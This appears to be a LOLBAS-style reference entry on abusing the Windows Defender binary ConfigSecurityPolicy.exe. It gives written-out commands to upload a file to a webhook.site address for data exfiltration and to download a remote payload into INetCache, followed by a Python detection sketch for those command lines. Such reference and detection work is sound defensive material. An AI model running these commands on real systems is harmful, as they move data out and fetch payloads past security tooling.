.. /ConfigSecurityPolicy.exe

Upload
Download (INetCache)

Binary part of Windows Defender. Used to manage settings in Windows Defender. You can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.


Paths:

Resources:
Acknowledgements:

Detection:

Upload

  1. Upload file, credentials or data exfiltration in general

    ConfigSecurityPolicy.exe C:\Windows\System32\calc.exe https://webhook.site/xxxxxxxxx?encodedfile
    Use case: Upload file
    Privileges required: User
    Operating systems: Windows 10
    ATT&CK® technique: T1567

Download

  1. It will download a remote payload and place it in INetCache.

    ConfigSecurityPolicy.exe https://example.com/payload
    Use case: Downloads payload from remote server
    Privileges required: User
    Operating systems: Windows 10, Windows 11
    ATT&CK® technique: T1105
    Tags: Download: INetCache
    INetCache downloaders typically store files in a randomly-named folder under %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE, with [1] or a higher number inserted between the file's name and its extension.
    If you downloaded a file named XYZ.exe, the full path of the downloaded file can be obtained by executing the following command:
    cmd.exe /c "where /r %LOCALAPPDATA%\Microsoft\Windows\INetCache XYZ*"
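
A detection sketch for the two command-line forms above, added here as an example and not part of the original page or the LOLBAS project. It classifies process-creation command lines and builds a pattern for the cached copy under INetCache; the sample events, the quoted install path and all function names are constructed for illustration.

```python
import ntpath
import re

URL = re.compile(r"^https?://", re.I)
TECHNIQUE = {"upload": "T1567", "download": "T1105"}  # IDs as listed on this page

def classify(cmdline):
    """Return (use_case, technique) for a ConfigSecurityPolicy.exe command line, else None."""
    # Split on whitespace but keep double-quoted arguments together.
    tokens = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]
    if not tokens or ntpath.basename(tokens[0]).lower() != "configsecuritypolicy.exe":
        return None
    args = tokens[1:]
    if not any(URL.match(a) for a in args):
        return None  # no remote URL: neither of the two forms described here
    # A non-URL argument next to the URL is the upload form; a URL alone is the download form.
    use_case = "upload" if any(not URL.match(a) for a in args) else "download"
    return use_case, TECHNIQUE[use_case]

def inetcache_regex(filename):
    """Regex for the cached copy: <name>[N]<ext> in a subfolder of INetCache\\IE."""
    stem, ext = ntpath.splitext(filename)
    return re.compile(
        r"\\Microsoft\\Windows\\INetCache\\IE\\[^\\]+\\"
        + re.escape(stem) + r"\[\d+\]" + re.escape(ext) + r"$", re.I)

# Constructed sample command lines (not real telemetry; paths are hypothetical).
SAMPLE_EVENTS = [
    r'ConfigSecurityPolicy.exe C:\Windows\System32\calc.exe https://webhook.site/xxxxxxxxx?encodedfile',
    r'"C:\Example Dir\ConfigSecurityPolicy.exe" https://example.com/payload',
    r'ConfigSecurityPolicy.exe C:\example\settings.xml',
    r'notepad.exe https://example.com/payload',
]

def hunt(events):
    """Return (event, verdict) pairs for events matching either form."""
    return [(e, v) for e in events if (v := classify(e))]

if __name__ == "__main__":
    for event, verdict in hunt(SAMPLE_EVENTS):
        print(verdict, event)
```

In practice the same logic would be fed the command-line field of process-creation events, and the regex applied to file-creation events to locate the cached file.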